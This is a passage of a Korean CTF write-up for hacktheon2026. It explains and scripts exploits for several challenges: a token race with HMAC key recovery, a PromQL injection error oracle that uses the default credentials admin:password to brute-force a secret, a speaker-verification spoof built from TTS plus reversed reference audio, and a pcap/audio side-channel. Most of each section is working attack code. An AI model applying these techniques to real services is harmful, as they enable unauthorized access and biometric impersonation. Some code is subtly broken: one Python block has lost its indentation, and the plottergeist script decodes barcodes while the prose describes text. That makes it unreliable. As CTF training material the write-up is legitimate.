            if not obj.get("valid"):
185
                continue
186
            if kind == "seal" and obj.get("session_seal"):
187
                session_seal = obj["session_seal"]
188
            if kind == "sign" and obj.get("signing_key"):
189
                signing_key = obj["signing_key"]
190

191
        return session_seal, signing_key
192

193

194
def decrypt_flag(encrypted_secret, signing_key, session_seal):
195
    raw = base64.b64decode(encrypted_secret)
196
    nonce, ct = raw[:12], raw[12:]
197
    key = hmac.new(
198
        signing_key.encode(),
199
        session_seal.encode(),
200
        hashlib.sha256,
201
    ).digest()[:32]
202
    return AESGCM(key).decrypt(nonce, ct, None).decode()
203

204

205
status, handoff = api_json(
206
    "/api/phase1-handoff",
207
    "POST",
208
    {"hmac_secret": SECRET},
209
)
210
assert status == 200, handoff
211

212
workspace_id = handoff["workspace_id"]
213
admin_jwt = handoff["admin_jwt"]
214
print("[+] workspace_id:", workspace_id)
215

216
session_seal = None
217
signing_key = None
218
override = None
219

220
for attempt in range(8):
221
    override = call_override(workspace_id)
222
    print("[+] override:", override["status"])
223

224
    session_seal, signing_key = race_use_token(
225
        workspace_id,
226
        admin_jwt,
227
        override["deploy_token"],
228
    )
229
    if session_seal and signing_key:
230
        break
231

232
    time.sleep(1)
233

234
assert override and session_seal and signing_key
235
print("[+] session_seal:", session_seal)
236
print("[+] signing_key:", signing_key)
237

238
flag = decrypt_flag(
239
    override["encrypted_secret"],
240
    signing_key,
241
    session_seal,
242
)
243
print("[+] flag:", flag)

플래그: hacktheon2026{lighth0use_se4l_cr4ck}

Observatory#

대시보드에는 Prometheus metric query 기능이 있다. /api/metrics를 보면 secret_config, internal_token, db_credentials 같은 metric 이름이 보인다. metric 파라미터로 직접 읽으면 결과가 현재 namespace 기준으로 가공되어 원본 label/value가 나오지 않았다.

여기서 볼 곳은 agg 파라미터였다. UI에서는 sum, avg, max 같은 값만 고르게 되어 있다. API에는 문자열이 그대로 들어간다. 서버는 PromQL을 이런 식으로 조립한다.

1
{agg}({metric}{namespace="현재 namespace"})

agg에 expression을 넣고 마지막을 or sum으로 끝냈다. 그러면 뒤에 붙는 (...metric...) 부분을 fallback 함수 호출로 소비시킬 수 있다.

출력은 숨겨져 있었다. 대신 error oracle을 만들었다. secret_config{flag=~"^PREFIX.*"}가 매칭되지 않으면 empty vector라 query가 성공한다. 매칭되면 일부러 many-to-one vector matching이 발생하도록 만들어 query error를 낸다.

oracle은 이렇게 잡았다.

1
sum(secret_config{flag=~"^PREFIX.*"})
2
+ on()
3
sum by(__name__)({__name__=~"go_.*"})
4
or sum

응답 기준은 이렇게 봤다.

1
Query failed -> prefix match
2
success      -> prefix miss

기본 계정 admin:password를 찾은 뒤, 이 oracle로 플래그 label을 한 글자씩 brute force했다.

익스플로잇 코드

1
import re
2
import requests
3

4
base = "http://43.201.43.169:3000"
5

6
s = requests.Session()
7
s.post(
8
    base + "/login",
9
    data={"username": "admin", "password": "password"},
10
    allow_redirects=False,
11
    timeout=5,
12
)
13

14

15
def prom_quote_regex(rx: str) -> str:
16
    return rx.replace("\\", "\\\\").replace('"', '\\"')
17

18

19
def oracle_regex(rx: str) -> bool:
20
    q = prom_quote_regex(rx)
21
    agg = (
22
        f'sum(secret_config{{flag=~"{q}"}}) '
23
        f'+ on() '
24
        f'sum by(__name__)({{__name__=~"go_.*"}}) '
25
        f'or sum'
26
    )
27

28
    r = s.post(
29
        base + "/api/query",
30
        json={"metric": "up", "agg": agg},
31
        timeout=5,
32
    )
33
    d = r.json()
34
    return d.get("status") == "error" and d.get("message") == "Query failed"
35

36

37
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_:-./@!$%&*+=,?[]()<>#"
38
prefix = ""
39

40
for _ in range(120):
41
    for ch in alphabet:
42
        candidate = prefix + ch
43
        if oracle_regex("^" + re.escape(candidate) + ".*"):
44
            prefix = candidate
45
            print(prefix)
46
            break
47
    else:
48
        break
49

50
    if prefix.endswith("}"):
51
        break
52

53
print("FLAG:", prefix)

플래그: hacktheon2026{pr0m3th3us_m3tr1c_s1d3ch4nn3l}

AI#

Voice Over#

서버는 업로드한 wav에서 두 값을 본다.

1
text_similarity    >= 0.8
2
speaker_similarity >= 0.8

일반 TTS로 target sentence를 합성하면 text similarity는 충분했다. speaker similarity는 낮다. reference wav를 그대로 넣으면 speaker similarity는 높다. 대신 transcript가 달라 text similarity가 낮다.

그래서 reference 음성을 ASR에는 의미 없는 소리처럼 만들고, speaker embedding에는 화자 특징을 남겼다. reference wav를 reverse한 뒤 낮은 볼륨으로 target TTS 뒤에 붙였다.

앞부분의 TTS 때문에 ASR은 목표 문장을 주로 인식한다. 뒤쪽의 reverse reference는 transcript에는 크게 섞이지 않는다. 대신 speaker verification에는 화자 특징을 보탠다.

볼륨은 sample_003 reverse 기준으로 0.12 정도가 적당했다. 너무 낮으면 speaker similarity가 부족하고, 너무 높으면 ASR transcript가 오염된다.

성공한 제출에서는 speaker similarity 0.8026, text similarity 0.8859가 나왔다.

익스플로잇 명령어

1
curl -sS http://3.37.31.209:8000/api/challenge > challenge.json
2
target=$(jq -r .target_sentence challenge.json)
3
token=$(jq -r .token challenge.json)
4

5
espeak-ng -v en-us -s 135 -w tts.wav "$target"
6
ffmpeg -y -loglevel error -i tts.wav -ar 16000 -ac 1 tts_16k.wav
7

8
ffmpeg -y -loglevel error -i sample_003.wav -af areverse sample_003_rev.wav
9
ffmpeg -y -loglevel error -i sample_003_rev.wav -filter:a "volume=0.12" ref.wav
10

11
printf "file '%s'\nfile '%s'\n" "$PWD/tts_16k.wav" "$PWD/ref.wav" > concat.txt
12
ffmpeg -y -loglevel error -f concat -safe 0 -i concat.txt -c copy submit.wav
13

14
curl -sS -F audio=@submit.wav -F token="$token" \
15
  http://3.37.31.209:8000/api/verify | jq .

플래그: hacktheon2026{b7d30e21e4106a6ca4d451a218f15a97}

Misc#

CathedralOfTheLastCandle#

5x8 격자의 각 칸은 . / * / ~ 세 상태를 가진다. 각 상태를 0, 1, 2로 두고 mod 3 위에서 계산했다.

문제에서 쓰는 연산은 이렇다.

1
ring -> [a+b, a+2b]
2
hush -> [2a+2b, 2a+b] (mod 3)

ring을 두 번 적용하면 현재 칸과 bonded neighbor가 둘 다 부호 반전된다. 그래서 각 칸에서 ring을 두 번 누른 전후 화면 차이를 보면, 현재 칸이 어느 칸과 연결되어 있는지 확인된다.

먼저 snake path로 모든 칸을 방문하면서 상태를 기록했다. 각 칸에서 ring을 두 번 실행하고, 바뀐 칸 중 현재 칸이 아닌 칸을 parent로 잡았다. 이렇게 전체 bonded neighbor 관계를 복구하면 rooted tree가 된다.

그다음에는 트리 위에서 모든 값을 0으로 만드는 DP를 짰다. 각 node에서는 “subtree를 모두 0으로 만들었을 때 parent 값이 어떻게 바뀌는지”를 저장했다.

1
rel[v][parent_before] = parent_after 후보들

상태는 처리한 child 집합, 현재 칸 값, parent 값으로 두고 Dijkstra를 돌렸다. 이미 0으로 만든 child에서 ring을 두 번 실행하면 child는 0으로 유지되고 현재 칸만 x -> 2x로 바뀌는데, 이 전이를 넣어야 안정적으로 풀렸다.

마지막 root (4,7)은 제단과 연결되어 있어 ring/hush로 root 값만 조정할 수 있다. 모든 칸을 0으로 만든 뒤 root에서 pray를 실행하면 플래그가 나온다.

익스플로잇 코드

1
#!/usr/bin/env python3
2
import re
3
import socket
4
from collections import defaultdict
5
from heapq import heappop, heappush
6
from itertools import count
7

8
HOST = "3.35.223.94"
9
PORT = 9000
10
H, W = 5, 8
11
ROOT = (4, 7)
12

13
ANSI_RE = re.compile(r"\x1b\[[0-9;]*[A-Za-z]")
14
TOK_RE = re.compile(r"\[[*~.]\]|[*~.]|\?")
15
VAL = {".": 0, "*": 1, "~": 2}
16
SYM = ".*~"
17

18

19
def recv_prompt(sock):
20
    data = b""
21
    while True:
22
        try:
23
            chunk = sock.recv(4096)
24
        except socket.timeout:
25
            break
26
        if not chunk:
27
            break
28
        data += chunk
29
        if b"> " in data[-200:] or b"HACK" in data or b"flag" in data.lower():
30
            break
31
    return data.decode("utf-8", "replace")
32

33

34
def send(sock, cmd):
35
    sock.sendall((cmd + "\n").encode())
36
    return recv_prompt(sock)
37

38

39
def parse_screen(out):
40
    out = ANSI_RE.sub("", out)
41
    m = re.search(r"Pos:\((\d+),(\d+)\).*Budget:(\d+)", out)
42
    if not m:
43
        return None, None, []
44
    pos = (int(m.group(1)), int(m.group(2)))
45
    budget = int(m.group(3))
46
    rows = []
47
    for line in out.splitlines():
48
        toks = TOK_RE.findall(line)
49
        if len(toks) >= W:
50
            row = []
51
            for tok in toks[:W]:
52
                row.append(tok[1] if tok.startswith("[") else tok)
53
            rows.append(row)
54
    return pos, budget, rows[-H:]
55

56

57
def visible(rows):
58
    cells = {}
59
    for r, row in enumerate(rows):
60
        for c, ch in enumerate(row):
61
            if ch != "?":
62
                cells[(r, c)] = VAL[ch]
63
    return cells
64

65

66
def observe(rows, state):
67
    for cell, value in visible(rows).items():
68
        state[cell] = value
69

70

71
def snake_moves():
72
    moves = []
73
    for r in range(H):
74
        moves.extend(["go e"] * (W - 1) if r % 2 == 0 else ["go w"] * (W - 1))
75
        if r != H - 1:
76
            moves.append("go s")
77
    return moves
78

79

80
def path_between(src, dst):
81
    r, c = src
82
    tr, tc = dst
83
    moves = []
84
    while r > tr:
85
        moves.append("go n")
86
        r -= 1
87
    while r < tr:
88
        moves.append("go s")
89
        r += 1
90
    while c > tc:
91
        moves.append("go w")
92
        c -= 1
93
    while c < tc:
94
        moves.append("go e")
95
        c += 1
96
    return moves
97

98

99
def move_pos(pos, cmd):
100
    r, c = pos
101
    if cmd == "go n":
102
        return (r - 1, c)
103
    if cmd == "go s":
104
        return (r + 1, c)
105
    if cmd == "go w":
106
        return (r, c - 1)
107
    if cmd == "go e":
108
        return (r, c + 1)
109
    return pos
110

111

112
def discover(sock):
113
    out = recv_prompt(sock)
114
    state = {}
115
    parent = {}
116
    moves = snake_moves()
117

118
    for idx in range(H * W):
119
        pos, budget, rows = parse_screen(out)
120
        observe(rows, state)
121
        before = visible(rows)
122

123
        out = send(sock, "ring")
124
        _, _, rows = parse_screen(out)
125
        observe(rows, state)
126
        out = send(sock, "ring")
127
        pos2, _, rows = parse_screen(out)
128
        observe(rows, state)
129

130
        after = visible(rows)
131
        diffs = [cell for cell in before if before[cell] != after.get(cell)]
132
        others = [cell for cell in diffs if cell != pos]
133
        parent[pos] = others[0] if len(others) == 1 else None
134

135
        if idx < len(moves):
136
            out = send(sock, moves[idx])
137
            _, _, rows = parse_screen(out)
138
            observe(rows, state)
139

140
    return parent, state
141

142

143
def apply_edge_power(a, b, k):
144
    if k == 0:
145
        return a, b
146
    if k == 1:
147
        return (a + b) % 3, (a + 2 * b) % 3
148
    if k == 2:
149
        return (2 * a) % 3, (2 * b) % 3
150
    if k == 3:
151
        return (2 * a + 2 * b) % 3, (2 * a + b) % 3
152
    raise ValueError(k)
153

154

155
def edge_ops(cell, k):
156
    if k == 0:
157
        return []
158
    if k == 1:
159
        return [(cell, "ring")]
160
    if k == 2:
161
        return [(cell, "ring"), (cell, "ring")]
162
    if k == 3:
163
        return [(cell, "hush")]
164
    raise ValueError(k)
165

166

167
def build_children(parent):
168
    children = defaultdict(list)
169
    root = None
170
    for cell, par in parent.items():
171
        if par is None:
172
            root = cell
173
        else:
174
            children[par].append(cell)
175
    return root, children
176

177

178
def best_update(table, key, cost, seq):
179
    old = table.get(key)
180
    if old is None or cost < old[0]:
181
        table[key] = (cost, seq)
182

183

184
def solve_plan(parent, state):
185
    root, children = build_children(parent)
186
    if root != ROOT:
187
        raise RuntimeError(f"unexpected root: {root}")
188

189
    rel_cache = {}
190

191
    def compute_rel(v):
192
        if v in rel_cache:
193
            return rel_cache[v]
194

195
        rel = {0: {}, 1: {}, 2: {}}
196
        kids = children[v]
197
        full = (1 << len(kids)) - 1
198

199
        for boundary in range(3):
200
            start = (0, state[v], boundary)
201
            pq = []
202
            serial = count()
203
            best = {start: (0, [])}
204
            heappush(pq, (0, next(serial), start))
205

206
            while pq:
207
                cost, _, cur = heappop(pq)
208
                if best[cur][0] != cost:
209
                    continue
210
                mask, a, b = cur
211
                seq = best[cur][1]
212

213
                if mask == full and a == 0:
214
                    best_update(rel[boundary], b, cost, seq)
215

216
                for op, k in (("ring", 1), ("hush", 3)):
217
                    a2, b2 = apply_edge_power(a, b, k)
218
                    nxt = (mask, a2, b2)
219
                    new = (cost + 1, seq + [(v, op)])
220
                    if nxt not in best or new[0] < best[nxt][0]:
221
                        best[nxt] = new
222
                        heappush(pq, (new[0], next(serial), nxt))
223

224
                for i, child in enumerate(kids):
225
                    bit = 1 << i
226
                    if mask & bit:
227
                        continue
228
                    child_rel = compute_rel(child)
229
                    for a2, (sub_cost, sub_seq) in child_rel.get(a, {}).items():
230
                        nxt = (mask | bit, a2, b)
231
                        new = (cost + sub_cost, seq + sub_seq)
232
                        if nxt not in best or new[0] < best[nxt][0]:
233
                        best[nxt] = new
234
                        heappush(pq, (new[0], next(serial), nxt))
235

236
                for i, child in enumerate(kids):
237
                    if not (mask & (1 << i)) or a == 0:
238
                        continue
239
                    nxt = (mask, 2 * a % 3, b)
240
                    flip = [(child, "ring"), (child, "ring")]
241
                    new = (cost + 2, seq + flip)
242
                    if nxt not in best or new[0] < best[nxt][0]:
243
                        best[nxt] = new
244
                        heappush(pq, (new[0], next(serial), nxt))
245

246
        rel_cache[v] = rel
247
        return rel
248

249
    kids = children[root]
250
    full = (1 << len(kids)) - 1
251
    start = (0, state[root])
252
    pq = []
253
    serial = count()
254
    seen = {start: (0, [])}
255
    heappush(pq, (0, next(serial), start))
256
    best_solution = None
257

258
    while pq:
259
        cost, _, cur = heappop(pq)
260
        if seen[cur][0] != cost:
261
            continue
262
        mask, a = cur
263
        seq = seen[cur][1]
264
        if mask == full and a == 0:
265
            best_solution = (cost, seq)
266
            break
267

268
        for op, a2 in (("ring", (a + 1) % 3), ("hush", (a - 1) % 3)):
269
            nxt = (mask, a2)
270
            new = (cost + 1, seq + [(root, op)])
271
            if nxt not in seen or new[0] < seen[nxt][0]:
272
                seen[nxt] = new
273
                heappush(pq, (new[0], next(serial), nxt))
274

275
        for i, child in enumerate(kids):
276
            bit = 1 << i
277
            if mask & bit:
278
                continue
279
            child_rel = compute_rel(child)
280
            for a2, (sub_cost, sub_seq) in child_rel.get(a, {}).items():
281
                nxt = (mask | bit, a2)
282
                new = (cost + sub_cost, seq + sub_seq)
283
                if nxt not in seen or new[0] < seen[nxt][0]:
284
                    seen[nxt] = new
285
                    heappush(pq, (new[0], next(serial), nxt))
286

287
        for i, child in enumerate(kids):
288
            if not (mask & (1 << i)) or a == 0:
289
                continue
290
            nxt = (mask, 2 * a % 3)
291
            flip = [(child, "ring"), (child, "ring")]
292
            new = (cost + 2, seq + flip)
293
            if nxt not in seen or new[0] < seen[nxt][0]:
294
                seen[nxt] = new
295
                heappush(pq, (new[0], next(serial), nxt))
296

297
    if best_solution is None:
298
        raise RuntimeError("no plan found")
299
    return best_solution[1]
300

301

302
def command_count_from(pos, ops):
303
    count = 0
304
    cur = pos
305
    for cell, _ in ops:
306
        count += abs(cur[0] - cell[0]) + abs(cur[1] - cell[1]) + 1
307
        cur = cell
308
    count += abs(cur[0] - ROOT[0]) + abs(cur[1] - ROOT[1]) + 1
309
    return count
310

311

312
def run():
313
    sock = socket.create_connection((HOST, PORT), timeout=5)
314
    sock.settimeout(2)
315

316
    parent, state = discover(sock)
317
    ops = solve_plan(parent, state)
318
    needed = command_count_from(ROOT, ops)
319
    print(f"mapped={len(parent)} ops={len(ops)} solve_commands={needed}")
320
    print("state after discovery:")
321
    for r in range(H):
322
        print("".join(SYM[state[(r, c)]] for c in range(W)))
323

324
    cur = ROOT
325
    out = ""
326
    for cell, op in ops:
327
        for cmd in path_between(cur, cell):
328
            out = send(sock, cmd)
329
            cur = move_pos(cur, cmd)
330
        out = send(sock, op)
331
    for cmd in path_between(cur, ROOT):
332
        out = send(sock, cmd)
333
        cur = move_pos(cur, cmd)
334
    out = send(sock, "pray")
335
    print(out)
336

337

338
if __name__ == "__main__":
339
    run()

플래그: hacktheon2026{db423210b697d95bdb3ae4c2751302283d7dafc25beb10e8ab9fb8863986339e3dd35fbe52ab0ddffdcfb952596394547002d319ffe6725299b9a51455f48fe2ccb0308b7699fe43}

plottergeist#

파일은 plottergeist.pcap과 bench_mic.wav 두 개가 주어졌다. pcap에는 plotter motion 정보가 있고, wav에는 같은 세션의 소리가 들어 있었다. traffic만 보면 어떤 이동이 pen down인지 알 수 없었다.

패킷 안에는 format 힌트가 있었다.

1
FMT:OP|SQ|DT|AM|BM

CoreXY 구조라 모터 이동량은 좌표로 바꿀 수 있다.

1
dX = (AM + BM) / 2
2
dY = (AM - BM) / 2

좌표 범위는 X: 16 ~ 368, Y: 4 ~ 10이다. 폭은 353, 높이는 7이다.

1
353 = 59 * 6 - 1

5x7 글자에 1픽셀 공백을 붙인 텍스트라고 보면 정확히 맞는다.

남은 건 DT=4와 DT=5 중 어느 쪽이 pen down인지 구분하는 일이었다. wav에서 motion 구간별 고주파 에너지를 비교하면 두 타입의 소리가 갈린다. 처음에는 더 시끄러운 쪽이 pen down처럼 보였다. 첫 motion이 시작 위치로 이동하는 동작이라는 점을 보면 정리된다. 첫 motion은 DT=5이고, 시작 이동에서는 잉크를 찍으면 안 된다. 그래서 DT=5가 pen up, DT=4가 pen down이다.

렌더링할 때는 AM=BM=0인 DT=4 packet도 버리면 안 된다. 이동량은 없지만 현재 위치에 점 하나를 찍는 명령이다. 이를 포함해 DT=4만 그리면 텍스트가 나온다.

reconstructed

익스플로잇 코드

1
import itertools
2
import math
3
import os
4
import re
5
import struct
6
import heapq
7
import wave
8
from collections import defaultdict
9

10
import numpy as np
11
from sklearn.linear_model import LogisticRegression
12
from sklearn.pipeline import make_pipeline
13
from sklearn.preprocessing import StandardScaler
14

15

16
PS = open("node_modules/bwip-js/barcode.ps").read()
17
lines = PS.splitlines()
18
arr = re.findall(r"\(([0-9]{8})\)", "\n".join(lines[20201:20892]))
19
patstr = [arr[:2401], arr[2401:]]
20

21

22
def bitsdig(s):
23
    out = []
24
    c = 1
25
    for ch in s:
26
        out += [c] * int(ch)
27
        c ^= 1
28
    return np.array(out, dtype=np.int8)
29

30

31
symbits = [[bitsdig(s) for s in patstr[p]] for p in [0, 1]]
32
parity = ["1001", "0101", "1100", "0011", "1010", "0110", "1111"]
33
charmap = list("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-. $/+%") + ["S1", "S2", "F1", "F2", "F3", "NS"]
34
val = {c: i for i, c in enumerate(charmap[:43])}
35
combos = re.findall(r"\((..)\)", re.search(r"/code49\.combos \[(.*?)\] readonly def", PS, re.S).group(1))
36
charvals = {ord(c): i for i, c in enumerate(charmap[:43])}
37
for asc, pair in enumerate(combos):
38
    if pair[0] == "1":
39
        charvals[asc] = [43, val[pair[1]]]
40
    elif pair[0] == "2":
41
        charvals[asc] = [44, val[pair[1]]]
42

43

44
def enc_start(s):
45
    first = charvals[ord(s[0])]
46
    cws = [first[1]]
47
    for ch in s[1:]:
48
        cv = charvals[ord(ch)]
49
        cws += cv if isinstance(cv, list) else [cv]
50
    return cws
51

52

53
prefix = enc_start("hacktheon2026{")
54

55

56
def parse_segments():
57
    p = open("plottergeist.pcap", "rb").read()
58
    pos = 24
59
    base = None
60
    cmds = []
61
    while pos + 16 <= len(p):
62
        ts_sec, ts_usec, incl, orig = struct.unpack("<IIII", p[pos : pos + 16])
63
        pos += 16
64
        data = p[pos : pos + incl]
65
        pos += incl
66
        if len(data) >= 42 and data[12:14] == b"\x08\x00" and data[23] == 17:
67
            ihl = (data[14] & 15) * 4
68
            off = 14 + ihl
69
            sport, dport, ulen, cs = struct.unpack("!HHHH", data[off : off + 8])
70
            pl = data[off + 8 : off + ulen]
71
            if base is None:
72
                base = ts_sec + ts_usec / 1e6
73
            if sport == 31337 and len(pl) == 10 and pl.endswith(b"~") and pl[0] == 0xA1:
74
                b = pl[:-1]
75
                cmds.append(
76
                    [
77
                        ts_sec + ts_usec / 1e6 - base,
78
                        b[1],
79
                        int.from_bytes(b[2:4], "little"),
80
                        b[4],
81
                        int.from_bytes(b[5:7], "big", signed=True),
82
                        int.from_bytes(b[7:9], "big", signed=True),
83
                    ]
84
                )
85
    segs = []
86
    x = y = 0
87
    ymap = {8: 0, 10: 1, 12: 2, 14: 3, 16: 4, 18: 5, 20: 6}
88
    for idx, c in enumerate(cmds):
89
        dx = c[4] + c[5]
90
        dy = c[4] - c[5]
91
        x2 = x + dx
92
        y2 = y + dy
93
        if y == y2 and dx != 0 and y in ymap:
94
            segs.append((idx, ymap[y], x / 2, x2 / 2, c[3], abs(dx / 2), c[0], cmds[idx + 1][0] if idx + 1 < len(cmds) else c[0] + 0.05))
95
        x, y = x2, y2
96
    return segs
97

98

99
segs = parse_segments()
100
bounds = []
101
for r in range(7):
102
    ss = [s for s in segs if s[1] == r]
103
    bounds.append((min(min(s[2], s[3]) for s in ss), max(max(s[2], s[3]) for s in ss)))
104

105

106
def code_row_bits(row, ccs):
107
    pstr = parity[row] if row < 6 else "0000"
108
    b = [0] * 10 + [1, 0]
109
    for j in range(4):
110
        b += list(symbits[int(pstr[j])][ccs[2 * j] * 49 + ccs[2 * j + 1]])
111
    b += [1] * 4 + [0]
112
    return np.array(b, dtype=np.int8)
113

114

115
def ccs7(cw):
116
    return cw + [sum(cw) % 49]
117

118

119
CODEMAP = list(reversed(range(7))) if os.environ.get("VFLIP") == "1" else list(range(7))
120
XFLIP = os.environ.get("HFLIP") == "1"
121

122

123
def obs_bits(code_row, ccs):
124
    b = code_row_bits(code_row, ccs)
125
    return b[::-1] if XFLIP else b
126

127

128
known = {CODEMAP[r]: obs_bits(r, ccs7(prefix[7 * r : 7 * r + 7])) for r in range(3)}
129
w = wave.open("bench_mic.wav", "rb")
130
fs = w.getframerate()
131
sig = np.frombuffer(w.readframes(w.getnframes()), dtype="<i2").astype(float)
132
sig -= sig.mean()
133
sig /= 32768
134
bands = [(0, 180), (180, 400), (400, 800), (800, 1200), (1200, 1700), (1700, 2400), (2400, 3300), (3300, 3900)]
135

136

137
def raw(off):
138
    X = []
139
    for s in segs:
140
        a = max(0, int((s[6] + off + 0.006) * fs))
141
        b = min(len(sig), int((s[7] + off - 0.006) * fs))
142
        ss = sig[a:b]
143
        spec = np.abs(np.fft.rfft(ss * np.hanning(len(ss)))) ** 2
144
        freqs = np.fft.rfftfreq(len(ss), 1 / fs)
145
        tot = spec.sum() + 1e-30
146
        vals = [np.sqrt(np.mean(ss * ss)), np.mean(abs(ss)), np.max(abs(ss)), (freqs * spec).sum() / tot]
147
        vals += [spec[(freqs >= lo) & (freqs < hi)].sum() / tot for lo, hi in bands]
148
        vals += [math.exp(np.mean(np.log(spec + 1e-30))) / (np.mean(spec) + 1e-30), ((ss[:-1] * ss[1:]) < 0).mean()]
149
        X.append(vals)
150
    return np.array(X)
151

152

153
Xs = []
154
for off in [-0.025, -0.02, -0.015, -0.01, -0.005, 0, 0.005, 0.01]:
155
    X = raw(off)
156
    R = []
157
    for col in range(X.shape[1]):
158
        vals = X[:, col]
159
        groups = defaultdict(list)
160
        for v, s in zip(vals, segs):
161
            groups[(s[1], s[4])].append(v)
162
        R.append([v - np.median(groups[(s[1], s[4])]) for v, s in zip(vals, segs)])
163
    Xs.append(np.hstack([X, np.array(R).T]))
164
Xall = np.hstack(Xs)
165
idx = []
166
lab = []
167
for n, s in enumerate(segs):
168
    if s[1] in known:
169
        r = s[1]
170
        lo, hi = bounds[r]
171
        x0, x1 = sorted([s[2], s[3]])
172
        m0 = (x0 - lo) / (hi - lo) * 81
173
        m1 = (x1 - lo) / (hi - lo) * 81
174
        num = den = 0
175
        for k in range(81):
176
            ov = max(0, min(m1, k + 1) - max(m0, k))
177
            if ov:
178
                num += ov * known[r][k]
179
                den += ov
180
        f = num / den
181
        if f > 0.85 or f < 0.15:
182
            idx.append(n)
183
            lab.append(1 if f > 0.85 else 0)
184
if os.environ.get("SIMPLE") == "1":
185
    simple = raw(float(os.environ.get("SOFF", "-0.02")))[:, int(os.environ.get("SCOL", "8"))]
186
    groups = defaultdict(list)
187
    for v, s in zip(simple, segs):
188
        groups[(s[1], s[4])].append(v)
189
    pred = np.array([v - np.median(groups[(s[1], s[4])]) for v, s in zip(simple, segs)])
190
else:
191
    clf = make_pipeline(StandardScaler(), LogisticRegression(C=0.2, max_iter=2000, class_weight="balanced")).fit(Xall[idx], lab)
192
    pred = clf.decision_function(Xall)
193
vals = (pred - np.median(pred)) / (np.std(pred) + 1e-9)
194
E = np.zeros((7, 81))
195
W = np.zeros((7, 81))
196
for v, s in zip(vals, segs):
197
    r = s[1]
198
    lo, hi = bounds[r]
199
    x0, x1 = sorted([s[2], s[3]])
200
    m0 = (x0 - lo) / (hi - lo) * 81
201
    m1 = (x1 - lo) / (hi - lo) * 81
202
    for k in range(max(0, int(m0) - 1), min(81, int(m1) + 2)):
203
        ov = max(0, min(m1, k + 1) - max(m0, k))
204
        if ov:
205
            E[r, k] += v * ov
206
            W[r, k] += ov
207
E = np.divide(E, W, out=np.zeros_like(E), where=W > 0)
208

209
cache = {}
210

211

212
def score_row(r, ccs):
213
    plot_r = CODEMAP[r]
214
    key = (r, tuple(ccs))
215
    if key not in cache:
216
        cache[key] = float(np.dot(E[plot_r], 2 * obs_bits(r, ccs) - 1))
217
    return cache[key]
218

219

220
basew = [1, 9, 31, 26, 2, 12, 17, 23, 37, 18, 22, 6, 27, 44, 15, 43, 39, 11, 13, 5, 41, 33, 36, 8, 4, 32, 3, 19, 40, 25, 29, 10, 24, 30]
221
wx = [20] + basew[:32]
222
wy = [16] + basew[1:33]
223
wz = [38] + basew[2:34]
224

225

226
def lastrow(cws):
227
    c = []
228
    for r in range(6):
229
        c += ccs7(cws[7 * r : 7 * r + 7])
230
    cr7 = 40
231

232
    def cal(w):
233
        return sum((c[2 * i] * 49 + c[2 * i + 1]) * w[i + 1] for i in range(24))
234

235
    wr1 = (cr7 * wz[0] + cal(wz)) % 2401
236
    wr2 = (cr7 * wy[0] + cal(wy) + wr1 * wy[25]) % 2401
237
    wr3 = (cr7 * wx[0] + cal(wx) + wr1 * wx[25] + wr2 * wx[26]) % 2401
238
    lr = [wr1 // 49, wr1 % 49, wr2 // 49, wr2 % 49, wr3 // 49, wr3 % 49, cr7]
239
    lr.append(sum(lr) % 49)
240
    return lr
241

242

243
fixed = sum(score_row(r, ccs7(prefix[7 * r : 7 * r + 7])) for r in range(3))
244

245

246
def build_cws(inner):
247
    c = prefix[:]
248
    for ch in inner:
249
        c += [44, 36 if ch == "_" else 10 + ord(ch) - 97]
250
    c += [44, 41]
251
    if len(c) > 42:
252
        return None
253
    return c + [48] * (42 - len(c))
254

255

256
def sc_inner(inner):
257
    c = build_cws(inner)
258
    sc = fixed + sum(score_row(r, ccs7(c[7 * r : 7 * r + 7])) for r in range(3, 6))
259
    lr = lastrow(c)
260
    return sc + score_row(6, lr), lr
261

262

263
chars = [chr(97 + i) for i in range(26)] + ["_"]
264
K = int(os.environ.get("K", "80"))
265
if os.environ.get("CANDS") or os.environ.get("CANDFILE"):
266
    if os.environ.get("CANDFILE"):
267
        cand_iter = [x.strip() for x in open(os.environ["CANDFILE"]) if x.strip()]
268
    else:
269
        cand_iter = os.environ["CANDS"].split(",")
270
    scored = []
271
    for inner in cand_iter:
272
        if len(inner) not in (7, 8):
273
            continue
274
        sc, lr = sc_inner(inner)
275
        scored.append((sc, inner, tuple(lr)))
276
    for sc, inner, lr in sorted(scored, reverse=True)[: int(os.environ.get("TOP", "200"))]:
277
        print(round(sc, 3), inner, lr)
278
    raise SystemExit
279
for L in [7, 8]:
280
    g1 = []
281
    for tup in itertools.product(chars, repeat=2):
282
        part = "".join(tup)
283
        c = build_cws(part + "a" * (L - 2))
284
        g1.append((score_row(3, ccs7(c[21:28])), part))
285
    g1 = heapq.nlargest(K, g1)
286
    g2 = []
287
    for tup in itertools.product(chars, repeat=4):
288
        mid = "".join(tup)
289
        dummy = "aa" + mid + "a" * max(0, L - 6)
290
        c = build_cws(dummy)
291
        g2.append((score_row(4, ccs7(c[28:35])), mid))
292
    g2 = heapq.nlargest(K, g2)
293
    n3 = L - 6
294
    g3 = []
295
    for tup in itertools.product(chars, repeat=n3):
296
        tail = "".join(tup)
297
        dummy = "aaaaaa" + tail
298
        c = build_cws(dummy)
299
        g3.append((score_row(5, ccs7(c[35:42])), tail))
300
    g3 = heapq.nlargest(K, g3)
301
    top = []
302
    for _, a in g1:
303
        for _, b in g2:
304
            for _, cpart in g3:
305
                inner = (a + b + cpart)[:L]
306
                sc, lr = sc_inner(inner)
307
                item = (sc, inner, tuple(lr))
308
                if len(top) < 40:
309
                    heapq.heappush(top, item)
310
                elif sc > top[0][0]:
311
                    heapq.heapreplace(top, item)
312
    print("L", L)
313
    for sc, inner, lr in sorted(top, reverse=True)[:20]:
314
        print(round(sc, 3), inner, lr)

플래그: hacktheon2026{the_plotter_reveals_its_secret_through_sound}